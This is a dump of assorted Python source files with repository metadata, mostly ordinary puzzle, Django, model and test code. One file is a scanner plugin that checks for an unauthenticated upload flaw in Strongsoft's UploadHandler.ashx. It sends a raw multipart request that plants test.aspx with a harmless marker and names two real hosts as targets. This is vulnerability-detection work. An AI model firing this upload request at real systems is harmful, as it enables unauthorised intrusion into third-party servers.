blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c74f7972df03e772c45471dfc507ca6f5efa0d51
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/118a320c-1596.py
|
3205edb6500e7b3aae3542131bb1317f8a8cac3c
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078
| 2019-01-18T09:42:47
| 2019-01-18T09:42:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
#coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#__Author__ = treeoph
import re,urlparse
def assign(service, arg):
    """Claim the task when the service is 'strongsoft'; otherwise decline (None)."""
    return (True, arg) if service == 'strongsoft' else None
def audit(arg):
    # PoC detector for an unauthenticated file upload in Strongsoft's
    # UploadHandler.ashx: POSTs a harmless marker file ("testvul") and then
    # checks whether the stored file is reachable over HTTP.
    p = urlparse.urlparse(arg)
    # Raw multipart/form-data request template; {scheme}/{netloc} are filled below.
    # NOTE(review): blank separator lines between part headers and part bodies
    # appear to have been lost in transport — multipart requires them; also the
    # hardcoded Content-Length: 1305 may not match the formatted body. Confirm
    # whether lib.curl recalculates these before sending.
    raw='''POST /SysManage/AjaxHandler/UploadHandler.ashx HTTP/1.1
Host: {netloc}
Content-Length: 1305
Origin: {scheme}://{netloc}
X-Requested-With: ShockwaveFlash/20.0.0.267
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Accept: */*
Referer: {scheme}://{netloc}/CommonReport/TableList.aspx?TableDBID=1009&pagetype=page&menuid=136
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filename"
test.aspx
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileName"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="DataType"
UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="GetFileInfo"
y
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="UploadFolder"
/CommonReport/
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="fileext"
*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.mpp;*.vsd;*.jpg;*.png;*.gif;*.bmp
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="TCID"
1009
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="folder"
/CommonReport/UploadFile
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Filedata"; filename="test.aspx"
Content-Type: application/octet-stream
GIF89a
testvul
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------ei4ae0Ij5cH2gL6cH2GI3KM7Ef1ei4--'''
    # curl.curl2 presumably sends the raw request verbatim to the target —
    # confirm against lib.curl's implementation.
    code,head,res,errcode, _=curl.curl2(arg+'SysManage/AjaxHandler/UploadHandler.ashx',raw=raw.format(scheme=p.scheme,netloc=p.netloc))
    if code == 200 and res:
        # The handler is expected to echo the stored file's relative path.
        m=re.search(r'([\w\/\d]+\.aspx)',res)
        if m:
            file_url='http://%s/%s'%(p.netloc,m.group())
            code,head,res,errcode, _=curl.curl2(file_url)
            # The marker content proves the upload was stored and is served.
            if 'testvul' in res:
                security_hole("Upload File at "+file_url)
if __name__=='__main__':
    # Standalone smoke run; `dummy` supplies the scanner framework stubs
    # (e.g. security_hole) normally provided by the host application.
    from dummy import *
    audit(assign('strongsoft','http://www.hzwr.gov.cn:8080/')[1])
    audit(assign('strongsoft','http://60.191.198.109:8060/')[1])
|
[
"yudekui@wsmtec.com"
] |
yudekui@wsmtec.com
|
6ae7560c7fe931a9cb233dbb80213d11ee6f4c7f
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p04001/s207133170.py
|
880c6edc03d8bb2cff7f1a58a4507040bed759aa
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
S = input()
# TODO: build the candidate token lists (e.g. [s1, "+", s2, s3, "+", s4]) with a recursive function
result = []  # filled by dfs() with every possible tokenization of S
def dfs(i, list):
    """Recursively enumerate every way of inserting "+" between the digits of S.

    Each complete tokenization (a list of digit and "+" tokens) is appended
    to the module-level `result`.
    NOTE(review): the parameter name `list` shadows the builtin — left
    unchanged in this documentation-only pass.
    """
    if i == len(S):
        # All digits consumed: record this tokenization.
        result.append(list)
        return
    else:
        if i == len(S) - 1:
            # Last digit: a "+" may not follow it.
            return dfs(i+1, list+[S[i]])
        else:
            # Branch: extend the current number, or close it with a "+".
            return dfs(i+1, list+[S[i]]), dfs(i+1, list+[S[i], "+"])
# Evaluate every candidate expression produced by dfs() and sum the results.
dfs(0, [])
ans = 0
for expr in result:
    expr_total = 0
    number = 0
    # Fold consecutive digit tokens into a number; "+" flushes it into the
    # expression total. (Rewritten: the original indexed with a loop variable
    # named `id`, shadowing the builtin, and used a C-style range(len()) loop.)
    for token in expr:
        if token == "+":
            expr_total += number
            number = 0
        else:
            number = number * 10 + int(token)
    expr_total += number  # flush the trailing number
    ans += expr_total
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
58c0b95d752a1cb35fe77a104190da67ab2925e7
|
f6ea25823706fe7db053b69639c57431ffc7c8be
|
/Datacademy/venv/bin/pip
|
5c7c8fd81e8f939cc5339c0a391c385f819336c4
|
[] |
no_license
|
BobbyJoeSmith3/Week10Hacks
|
6f57d34a16a01c6a019730539257910b878eef11
|
43aba9b979bc26ec118eb4af4b0d0149ee87461c
|
refs/heads/master
| 2021-01-18T13:42:34.055202
| 2014-06-26T15:36:50
| 2014-06-26T15:36:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
#!/home/bobbyjoesmith/Training/Week10/Week10Hacks/Datacademy/venv/bin/python
# -*- coding: utf-8 -*-
# Auto-generated console-script entry point for pip inside this virtualenv.
import re
import sys

from pip import main

if __name__ == '__main__':
    # Normalize argv[0]: strip a trailing "-script.pyw" / ".exe" suffix
    # (Windows launcher artifacts) so pip reports a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"bobbyjoe@codeforprogress.org"
] |
bobbyjoe@codeforprogress.org
|
|
709eb35365d3a06bd9f24087e46777e7a7b37dee
|
2b255d07420114c40f6c8aeb0fb25228588282ed
|
/sitecomber/apps/config/management/commands/crawl_page.py
|
f50bc927ac3a48312f85620262611ccad9a81b10
|
[] |
no_license
|
ninapavlich/sitecomber
|
b48b3ee055dac1f419c98f08fffe5e9dc44bd6e3
|
6f34e5bb96ca4c119f98ee90c88881e8ca3f6f06
|
refs/heads/master
| 2022-12-11T20:55:07.215804
| 2020-03-13T07:58:28
| 2020-03-13T07:58:28
| 197,045,165
| 1
| 0
| null | 2022-12-08T01:47:52
| 2019-07-15T17:42:31
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
import logging
from django.core.management.base import BaseCommand
from django.core.exceptions import ObjectDoesNotExist
from sitecomber.apps.results.models import PageResult
logger = logging.getLogger('django')
class Command(BaseCommand):
    """
    Crawl a single stored page result and re-run the site's tests on it.

    Example Usage:

        Load and parse page result with primary key 1:
        python manage.py crawl_page 1
    """
    help = 'Crawl Site'

    def add_arguments(self, parser):
        # Accepts one or more primary keys, but handle() only uses the first.
        parser.add_argument('page_result_pk', nargs='+', type=int)

    def handle(self, *args, **options):
        page_result_pk = int(options['page_result_pk'][0])
        logger.info("Going to load page %s" % (page_result_pk))

        try:
            page = PageResult.objects.get(pk=page_result_pk)
        except ObjectDoesNotExist:
            # Bail out quietly with an error log rather than a traceback.
            logger.error(u"Could not find page result with primary key = %s" % (page_result_pk))
            return

        # Fetch/parse the page, then run every configured test against it.
        page.load()
        tests = page.site_domain.site.tests
        for test in tests:
            test.page_parsed(page)
|
[
"nina@ninalp.com"
] |
nina@ninalp.com
|
626a4d10d7b29271ed92d511a73c67b98affecb1
|
bf8f377422db9954b81cc44259f0450f7799541d
|
/pawn_stars/wsgi.py
|
7db541520d3b5221158eb09ea6282ea4bf8a8fdb
|
[
"MIT"
] |
permissive
|
team-pawn-stars/PawnStars-Backend
|
c7acaaa10fa2f40f77822e5a99af0a9890797471
|
b1ea9d29adea65b3004555386b51e488460d1b30
|
refs/heads/master
| 2020-05-04T13:55:34.080903
| 2019-06-13T12:59:55
| 2019-06-13T12:59:55
| 179,179,127
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
"""
WSGI config for pawn_stars project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pawn_stars.settings")
application = get_wsgi_application()
|
[
"python@istruly.sexy"
] |
python@istruly.sexy
|
e8dd6a42a1f6eb6d94cefb986c43a7cd569be71b
|
48e08c7d5856c35492500b6b01d3d72a31f58ffc
|
/Leetcode/0051-0100/0086-partition-list.py
|
74ffde18be275050ee72f79c301933fb36d60ee1
|
[
"MIT"
] |
permissive
|
MiKueen/Data-Structures-and-Algorithms
|
8d8730e539e1c112cbd4a51beae9e1c3e2184e63
|
8788bde5349f326aac0267531f39ac7a2a708ee6
|
refs/heads/master
| 2021-07-18T17:16:39.948239
| 2020-09-13T15:44:37
| 2020-09-13T15:44:37
| 212,309,543
| 0
| 1
|
MIT
| 2019-10-06T16:24:43
| 2019-10-02T10:19:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
'''
Author : MiKueen
Level : Medium
Problem Statement : Partition List
Given a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.
You should preserve the original relative order of the nodes in each of the two partitions.
Example:
Input: head = 1->4->3->2->5->2, x = 3
Output: 1->2->2->4->3->5
'''
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def partition(self, head, x):
        """
        Stable-partition a singly linked list around x: nodes < x first,
        nodes >= x after, relative order preserved within each group.
        :type head: ListNode
        :type x: int
        :rtype: ListNode
        """
        # Two dummy-headed sub-lists: one for values below x, one for the rest.
        before = before_tail = ListNode(0)
        after = after_tail = ListNode(0)

        node = head
        while node:
            if node.val < x:
                before_tail.next = node
                before_tail = before_tail.next
            else:
                after_tail.next = node
                after_tail = after_tail.next
            node = node.next

        # Terminate the second list, then splice the two lists together.
        after_tail.next = None
        before_tail.next = after.next
        return before.next
|
[
"keshvi2298@gmail.com"
] |
keshvi2298@gmail.com
|
684022b71ef0d7261d8e43295a62ebc0b0fd84be
|
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
|
/python/BichenWuUCB_squeezeDet/squeezeDet-master/src/nets/resnet50_convDet.py
|
b1d4cde60ed5f428dd7949a8c1ad08f053b0b4cf
|
[] |
no_license
|
LiuFang816/SALSTM_py_data
|
6db258e51858aeff14af38898fef715b46980ac1
|
d494b3041069d377d6a7a9c296a14334f2fa5acc
|
refs/heads/master
| 2022-12-25T06:39:52.222097
| 2019-12-12T08:49:07
| 2019-12-12T08:49:07
| 227,546,525
| 10
| 7
| null | 2022-12-19T02:53:01
| 2019-12-12T07:29:39
|
Python
|
UTF-8
|
Python
| false
| false
| 6,835
|
py
|
# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016
"""ResNet50+ConvDet model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import joblib
from utils import util
from easydict import EasyDict as edict
import numpy as np
import tensorflow as tf
from nn_skeleton import ModelSkeleton
class ResNet50ConvDet(ModelSkeleton):
  """ResNet-50 backbone with a ConvDet detection head (TF1 graph-mode)."""

  def __init__(self, mc, gpu_id):
    # Build the entire model graph on the requested GPU.
    with tf.device('/gpu:{}'.format(gpu_id)):
      ModelSkeleton.__init__(self, mc)

      self._add_forward_graph()
      self._add_interpretation_graph()
      self._add_loss_graph()
      self._add_train_graph()
      self._add_viz_graph()

  def _add_forward_graph(self):
    """NN architecture: conv1 stem, conv2_x-conv4_x residual stages, ConvDet head."""

    mc = self.mc
    if mc.LOAD_PRETRAINED_MODEL:
      assert tf.gfile.Exists(mc.PRETRAINED_MODEL_PATH), \
          'Cannot find pretrained model at the given path:' \
          ' {}'.format(mc.PRETRAINED_MODEL_PATH)
      # Weights converted from a Caffe model, keyed by Caffe layer name.
      self.caffemodel_weight = joblib.load(mc.PRETRAINED_MODEL_PATH)

    # Stem: 7x7/2 conv + 3x3/2 max-pool (frozen, pretrained).
    conv1 = self._conv_bn_layer(
        self.image_input, 'conv1', 'bn_conv1', 'scale_conv1', filters=64,
        size=7, stride=2, freeze=True, conv_with_bias=True)
    pool1 = self._pooling_layer(
        'pool1', conv1, size=3, stride=2, padding='VALID')

    # conv2_x: residual blocks res2a-res2c (frozen). res2a has a projection
    # shortcut (branch1); later blocks use identity shortcuts.
    with tf.variable_scope('conv2_x') as scope:
      with tf.variable_scope('res2a'):
        branch1 = self._conv_bn_layer(
            pool1, 'res2a_branch1', 'bn2a_branch1', 'scale2a_branch1',
            filters=256, size=1, stride=1, freeze=True, relu=False)
        branch2 = self._res_branch(
            pool1, layer_name='2a', in_filters=64, out_filters=256,
            down_sample=False, freeze=True)
        res2a = tf.nn.relu(branch1+branch2, 'relu')
      with tf.variable_scope('res2b'):
        branch2 = self._res_branch(
            res2a, layer_name='2b', in_filters=64, out_filters=256,
            down_sample=False, freeze=True)
        res2b = tf.nn.relu(res2a+branch2, 'relu')
      with tf.variable_scope('res2c'):
        branch2 = self._res_branch(
            res2b, layer_name='2c', in_filters=64, out_filters=256,
            down_sample=False, freeze=True)
        res2c = tf.nn.relu(res2b+branch2, 'relu')

    # conv3_x: res3a-res3d (frozen); res3a downsamples with stride 2.
    with tf.variable_scope('conv3_x') as scope:
      with tf.variable_scope('res3a'):
        branch1 = self._conv_bn_layer(
            res2c, 'res3a_branch1', 'bn3a_branch1', 'scale3a_branch1',
            filters=512, size=1, stride=2, freeze=True, relu=False)
        branch2 = self._res_branch(
            res2c, layer_name='3a', in_filters=128, out_filters=512,
            down_sample=True, freeze=True)
        res3a = tf.nn.relu(branch1+branch2, 'relu')
      with tf.variable_scope('res3b'):
        branch2 = self._res_branch(
            res3a, layer_name='3b', in_filters=128, out_filters=512,
            down_sample=False, freeze=True)
        res3b = tf.nn.relu(res3a+branch2, 'relu')
      with tf.variable_scope('res3c'):
        branch2 = self._res_branch(
            res3b, layer_name='3c', in_filters=128, out_filters=512,
            down_sample=False, freeze=True)
        res3c = tf.nn.relu(res3b+branch2, 'relu')
      with tf.variable_scope('res3d'):
        branch2 = self._res_branch(
            res3c, layer_name='3d', in_filters=128, out_filters=512,
            down_sample=False, freeze=True)
        res3d = tf.nn.relu(res3c+branch2, 'relu')

    # conv4_x: res4a-res4f. No freeze flag from here on, so these layers train.
    with tf.variable_scope('conv4_x') as scope:
      with tf.variable_scope('res4a'):
        branch1 = self._conv_bn_layer(
            res3d, 'res4a_branch1', 'bn4a_branch1', 'scale4a_branch1',
            filters=1024, size=1, stride=2, relu=False)
        branch2 = self._res_branch(
            res3d, layer_name='4a', in_filters=256, out_filters=1024,
            down_sample=True)
        res4a = tf.nn.relu(branch1+branch2, 'relu')
      with tf.variable_scope('res4b'):
        branch2 = self._res_branch(
            res4a, layer_name='4b', in_filters=256, out_filters=1024,
            down_sample=False)
        res4b = tf.nn.relu(res4a+branch2, 'relu')
      with tf.variable_scope('res4c'):
        branch2 = self._res_branch(
            res4b, layer_name='4c', in_filters=256, out_filters=1024,
            down_sample=False)
        res4c = tf.nn.relu(res4b+branch2, 'relu')
      with tf.variable_scope('res4d'):
        branch2 = self._res_branch(
            res4c, layer_name='4d', in_filters=256, out_filters=1024,
            down_sample=False)
        res4d = tf.nn.relu(res4c+branch2, 'relu')
      with tf.variable_scope('res4e'):
        branch2 = self._res_branch(
            res4d, layer_name='4e', in_filters=256, out_filters=1024,
            down_sample=False)
        res4e = tf.nn.relu(res4d+branch2, 'relu')
      with tf.variable_scope('res4f'):
        branch2 = self._res_branch(
            res4e, layer_name='4f', in_filters=256, out_filters=1024,
            down_sample=False)
        res4f = tf.nn.relu(res4e+branch2, 'relu')

    dropout4 = tf.nn.dropout(res4f, self.keep_prob, name='drop4')

    # ConvDet head: a single 3x3 conv; per anchor it outputs CLASSES class
    # scores + 1 confidence + 4 box parameters (see num_output formula).
    num_output = mc.ANCHOR_PER_GRID * (mc.CLASSES + 1 + 4)
    self.preds = self._conv_layer(
        'conv5', dropout4, filters=num_output, size=3, stride=1,
        padding='SAME', xavier=False, relu=False, stddev=0.0001)

  def _res_branch(
      self, inputs, layer_name, in_filters, out_filters, down_sample=False,
      freeze=False):
    """Residual branch constructor (the bottleneck "branch2" path).

    Args:
      inputs: input tensor
      layer_name: layer name suffix, e.g. '2a'
      in_filters: number of filters in XX_branch2a and XX_branch2b layers.
      out_filters: number of filters in XX_branch2c layers.
      down_sample: if true, down sample the input feature map (stride 2)
      freeze: if true, do not change parameters in this layer
    Returns:
      A residual branch output operation.
    """
    with tf.variable_scope('res'+layer_name+'_branch2'):
      stride = 2 if down_sample else 1
      # 1x1 reduce (carries the stride) -> 3x3 conv -> 1x1 expand. The final
      # layer skips ReLU: the caller applies it after the shortcut addition.
      output = self._conv_bn_layer(
          inputs,
          conv_param_name='res'+layer_name+'_branch2a',
          bn_param_name='bn'+layer_name+'_branch2a',
          scale_param_name='scale'+layer_name+'_branch2a',
          filters=in_filters, size=1, stride=stride, freeze=freeze)
      output = self._conv_bn_layer(
          output,
          conv_param_name='res'+layer_name+'_branch2b',
          bn_param_name='bn'+layer_name+'_branch2b',
          scale_param_name='scale'+layer_name+'_branch2b',
          filters=in_filters, size=3, stride=1, freeze=freeze)
      output = self._conv_bn_layer(
          output,
          conv_param_name='res'+layer_name+'_branch2c',
          bn_param_name='bn'+layer_name+'_branch2c',
          scale_param_name='scale'+layer_name+'_branch2c',
          filters=out_filters, size=1, stride=1, freeze=freeze, relu=False)
    return output
|
[
"659338505@qq.com"
] |
659338505@qq.com
|
7fa896bdd5e866fa37b79413b77428eca5f260da
|
8a1144dd38388992c7e35a4cc84002e381f2cf1f
|
/python/django_fundamentals/main3/apps/third_app/models.py
|
ef165f7feabe4f6b980f5a16ea9002f10e11ff54
|
[] |
no_license
|
vin792/dojo_assignments
|
18472e868610bacbd0b5141a5322628f4afefb5b
|
449b752f92df224285bfd5d03901a3692a98562e
|
refs/heads/master
| 2021-01-20T00:20:09.896742
| 2017-05-26T17:37:09
| 2017-05-26T17:37:09
| 82,735,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class People(models.Model):
    """Minimal person record with automatic created/updated timestamps."""
    first_name = models.CharField(max_length=30)
    last_name = models.CharField(max_length=30)
    created_at = models.DateTimeField(auto_now_add=True)  # set once, on insert
    updated_at = models.DateTimeField(auto_now=True)  # refreshed on every save()
|
[
"vin792@gmail.com"
] |
vin792@gmail.com
|
ba298290ffb40d5dda804815a82833564aff7427
|
73036231277447340ce6ac8cf08fa5aab9772778
|
/libreria/libreria/static/img/django-cities-light-2.0.7/django-cities-light-2.0.7/cities_light/migrations/0012_set_display_name.py
|
e74659676bac3c57ec48aeec83ee56f96928836b
|
[
"MIT"
] |
permissive
|
jesusmaherrera/books_library
|
68f23e2352644df66f92d9e37baf274486984bed
|
c621f86aa2f8000c13371aea2b000a9bd8965fa1
|
refs/heads/master
| 2021-01-13T02:06:24.579310
| 2013-02-06T03:21:16
| 2013-02-06T03:21:16
| 5,944,653
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,926
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
    """South data migration: populate display_name on Region and City rows."""

    def forwards(self, orm):
        # Region display name: "<region>, <country>".
        for region in orm['cities_light.Region'].objects.all():
            region.display_name = u'%s, %s' % (
                region.name, region.country.name)
            region.save()

        # City display name includes the region only when one is set.
        for city in orm['cities_light.City'].objects.all():
            if city.region_id:
                city.display_name = u'%s, %s, %s' % (
                    city.name, city.region.name, city.country.name)
            else:
                city.display_name = u'%s, %s' % (
                    city.name, city.country.name)
            city.save()

    def backwards(self, orm):
        "Write your backwards methods here."

    # Frozen ORM state South uses to construct the `orm` object passed above.
    models = {
        'cities_light.city': {
            'Meta': {'unique_together': "(('region', 'name'),)", 'object_name': 'City'},
            'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
            'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
            'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
            'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
            'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
            'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Region']", 'null': 'True'}),
            'search_names': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '4000', 'db_index': 'True', 'blank': 'True'}),
            'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
        },
        'cities_light.country': {
            'Meta': {'object_name': 'Country'},
            'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
            'code2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
            'code3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
            'continent': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
            'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
            'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
            'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'}),
            'tld': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '5', 'blank': 'True'})
        },
        'cities_light.region': {
            'Meta': {'unique_together': "(('country', 'name'),)", 'object_name': 'Region'},
            'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
            'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
            'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'geoname_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
            'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
            'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
            'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
        }
    }

    complete_apps = ['cities_light']
    symmetrical = True
|
[
"jesusmaherrera@gmail.com"
] |
jesusmaherrera@gmail.com
|
7aaaf55396fa42efe3b6ca2c9c2de6dd06a030d0
|
95a6555114011d7ba9b0a842dd348dc4a18a56fc
|
/utils/register_user.py
|
f825ea8fd83e3071a42ff655b47e64950ed36251
|
[
"Unlicense"
] |
permissive
|
battyone/ParaBankSeleniumAutomation
|
c96dfdcb11591dd12db31b7ddd373326ce4284f7
|
e28a886adba89b82a60831ad96a3a8f00f863116
|
refs/heads/master
| 2023-05-04T19:58:13.067568
| 2020-03-15T17:19:09
| 2020-03-15T17:19:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,214
|
py
|
# Created by Egor Kostan.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
import time
import allure
from utils.open_web_browser import open_web_browser
from page_object_models.register_page_model import RegisterPageModel
from expected_results.page_content.register_page_content import RegisterPageContent
from utils.step_definition import step_definition
def register_user(user, config):
    '''
    Registers a new user via the "Register" web form.
    Does not check for any errors beyond verifying the welcome message.
    Using Selenium webdriver + chrome browser by default

    :param user: object exposing the personal/credential fields typed below
    :param config: browser/environment configuration for open_web_browser
    :return: None
    '''
    page_model = RegisterPageModel
    page_context = RegisterPageContent

    print("\nUser registration procedure...")
    print("\n1. Open web browser...")
    page = open_web_browser(config=config,
                            page_model=page_model,
                            page_content=page_context)

    with allure.step("Fill out Register web form"):
        print("\n2. Filling out user data...")
        page.type_first_name(user.first_name)
        page.type_last_name(user.last_name)
        page.type_address(user.address)
        page.type_city(user.city)
        page.type_state(user.state)
        page.type_zip_code(user.zip_code)
        page.type_phone(user.phone)
        page.type_ssn(user.ssn)
        page.type_username(user.username)
        page.type_password(user.password)
        page.type_confirm(user.password)  # confirm field reuses the password

    with allure.step("Hit 'REGISTER' button"):
        print("\n3. Hit 'REGISTER' button...")
        page.hit_register_btn()
        time.sleep(3)  # fixed wait for the post-submit page; no explicit wait used

    with allure.step("Verify \"Welcome\" message"):
        print('Verify "Welcome" message...')
        expected = RegisterPageContent.WELCOME_MESSAGE['message']
        actual = page.welcome_message
        # NOTE(review): failure only prints — it does not raise/fail the flow.
        if expected == actual:
            print("OK: Welcome message detected")
        else:
            print("ERROR: Welcome message does not appear")

    with allure.step("Do Log Out"):
        print("\n4. Do Log Out...")
        page.hit_log_out_button()
        time.sleep(3)

    with allure.step("Close web browser"):
        print("\n5. Close web browser...")
        page.quit()
|
[
"igorkostan@gmail.com"
] |
igorkostan@gmail.com
|
28ee36dd6ff812fe4e277bd07efe81507c608c41
|
836d5f7190f6b4503e758c87c71598f18fdfce14
|
/5-Döngüler/While-Döngüsü.py
|
1ac3301b95952b419549dd7879fcf6fe5c4abac3
|
[] |
no_license
|
S-Oktay-Bicici/PYTHON-PROGRAMMING
|
cf452723fd3e7e8ec2aadc7980208d747c502e9a
|
22e864f89544249d6309d6f4570a4104bf47346b
|
refs/heads/main
| 2021-11-30T00:19:21.158084
| 2021-11-16T15:44:29
| 2021-11-16T15:44:29
| 316,716,147
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 425
|
py
|
############################################################
# Runs exactly once: x becomes 1 and the condition x <= 0 fails.
x = 0
while x <= 0:
    print("doğru")
    x += 1
print("x in değeri: ", x)
############################################################
# Print the even numbers from 2 through 100.
a = 0
while a < 100:
    a += 1
    if a % 2 == 0:
        print(a)
#############################################################
# Print each Turkish-specific letter on its own line.
